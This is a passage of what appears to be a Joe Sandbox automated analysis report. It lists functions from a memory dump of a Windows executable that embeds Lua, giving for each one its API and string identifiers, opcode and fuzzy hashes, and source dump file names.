                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                      • API String ID: 3255926029-3252031757
                                                      • Opcode ID: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                      • Instruction ID: 7e793c99a8b7a5edc4d4280f25412157ad23ba08bc86756640cb1d3fb38780b3
                                                      • Opcode Fuzzy Hash: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                      • Instruction Fuzzy Hash: F23158E8D08647B1FA04FBA0E8965E4A321AB45354FC044B3D00F565A18E7CEB4FE3A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEA8590 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm$_free_nolock
                                                      • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                      • API String ID: 338564694-1474762456
                                                      • Opcode ID: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                      • Instruction ID: 698b508d6f62bf35b6fce59231255becceab2d6a687f30f6f248106e5c6724c8
                                                      • Opcode Fuzzy Hash: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                      • Instruction Fuzzy Hash: 45517269A28982A2F710FB69E8532AAE360FBC0390FC00272F95D476B9CF7DD505D750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE77CA0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm
                                                      • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                      • API String ID: 1214967616-750625491
                                                      • Opcode ID: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                      • Instruction ID: 34c8a7e17599614dc9e86594a567adf8a1e2ad525d7434efb8deeeb7b9d56360
                                                      • Opcode Fuzzy Hash: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                      • Instruction Fuzzy Hash: 3391612660C6C695EB70EB15E4423AEB7A0FBC8780F904572EA9D87B68DF7DD440DB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEA7E50 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolockwcsftime
                                                      • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                      • API String ID: 793903186-297742768
                                                      • Opcode ID: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                      • Instruction ID: 5216a9a18250232bdf8ddb28070b3d15000aee3d5d4459e3b22c8a7231caee45
                                                      • Opcode Fuzzy Hash: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                      • Instruction Fuzzy Hash: 35C12F7A718B8595EB20EB15E48236AB7A0F7C9BD4F900171EA8D87B69DF3CD440DB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE8E5D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 52libraryloaderthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                      • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                      • API String ID: 4260375681-184456188
                                                      • Opcode ID: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                      • Instruction ID: 856ba6eeb261af2725f6b9a0916a68f0c4ed0cad58d77b8217fdb03f84e748d9
                                                      • Opcode Fuzzy Hash: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                      • Instruction Fuzzy Hash: D421F93A508B86D2EB10EB09E48636AB3B1FB85B84FA00076EB4D47764DF3ED845D700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3215C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: -$f$p$p
                                                      • API String ID: 3215553584-2516539321
                                                      • Opcode ID: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                      • Instruction ID: 025b24c538eda1b24688d11243a86aef3e8dd73f8c3719c6a208c6d35e3f8f87
                                                      • Opcode Fuzzy Hash: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                      • Instruction Fuzzy Hash: EE12E56AE0C143A6FB28BB15D05627DF6A1FB60760FD44271E699076C4DF3EE580AB30
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF10144 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      • Opcode ID: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                      • Instruction ID: db52881062ccffa4ac9cad82e620a84409a0b7cfc59cb5b8ead1dde0a72ffb09
                                                      • Opcode Fuzzy Hash: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                      • Instruction Fuzzy Hash: 2DE1A176A087439AFB20EB66D4822ADB7A0FB45B98F800175EE8D57B55CF3CE081D711
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF0F3FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F481
                                                      • GetLastError.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F48F
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F4B9
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F4FF
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F50B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      • Opcode ID: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                      • Instruction ID: 69e2f326af2c54e8ac2a5d95b381b325ca80f6818b470bf1662d25b205381ac9
                                                      • Opcode Fuzzy Hash: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                      • Instruction Fuzzy Hash: E331E229A1A743A1FE65FF02A802575A3D4BF08BA0FC94675ED2E87794DF3CE1409321
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF4F1B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      • Opcode ID: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                      • Instruction ID: 92dfe71295bf2efc841c4b159b6b8bf56f1fe224bb4c55e958a712edd7066993
                                                      • Opcode Fuzzy Hash: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                      • Instruction Fuzzy Hash: 0511D325B18A4386FB50BB12E845339E3A4FB88FE4F800274EA1D837A4CF3CE5109754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE76760 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 386COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =[C]$Lua$main
                                                      • API String ID: 0-2004024069
                                                      • Opcode ID: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                      • Instruction ID: 4ef41ed8fb1b1d67a3156297b80212d2894806ff82e55d978eb539e9e5f2b8d2
                                                      • Opcode Fuzzy Hash: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                      • Instruction Fuzzy Hash: ED220A36608B8585EB70DB19E08136EBBA0F7C9B94F504166DA9D87BA8DF3DD440DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE8E430 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: C$I$J$N
                                                      • API String ID: 3168844106-327184588
                                                      • Opcode ID: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                      • Instruction ID: bd102e7b38f6776564906c7446146431d1da167a2dff7c624996bef2ffa60cb1
                                                      • Opcode Fuzzy Hash: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                      • Instruction Fuzzy Hash: 28314B7651D7818EE760EB15E04222AFBA0F788B68F001266FB8E43B98CB7CD5459F05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF2FCD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$cosh
                                                      • API String ID: 1156100317-3800341493
                                                      • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                      • Instruction ID: 7d603041faa1fd72b4c7d81c46bbd503cc7c221a80685c4f901d61e045dd6e11
                                                      • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                      • Instruction Fuzzy Hash: 2D810665E28F8699F6639B34A0423B6F318AF6A3D5F508333D58F31A51DF2DE1829710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF10978 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                      • String ID: csm$csm
                                                      • API String ID: 851805269-3733052814
                                                      • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                      • Instruction ID: eece637c2e890a5901663c4ef1fb9d68f353812209237ccb95bd1dfb7b29f953
                                                      • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                      • Instruction Fuzzy Hash: EB61A23A9083439BFB24AF12D491368B7A0FB54B98F984176DA9C87795CF3CE490D711
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE92AA0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: type_info::_name_internal_method
                                                      • String ID: builtin#$false$nil$true
                                                      • API String ID: 3713626258-3570738779
                                                      • Opcode ID: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                      • Instruction ID: 0e39a9a1c3b359bf87ee7e0ad22a4c305fa806dc56fb05ffd8182d82700c522e
                                                      • Opcode Fuzzy Hash: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                      • Instruction Fuzzy Hash: B661342661CB4595FE60EB19E48212DB3A0FB88BE4F905376EA9D877F4CF2CD1409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEAB290 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                      • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                      • API String ID: 1341846612-1452030528
                                                      • Opcode ID: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                      • Instruction ID: c96c2425d61611c00bb74574470f848c922a4e282457b9b05a53353dc6d22451
                                                      • Opcode Fuzzy Hash: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                      • Instruction Fuzzy Hash: D1314729A2C94361F760F761D8573FAE350EFC5384FC04175E94E466E6DE2CE505A720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEA9610 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
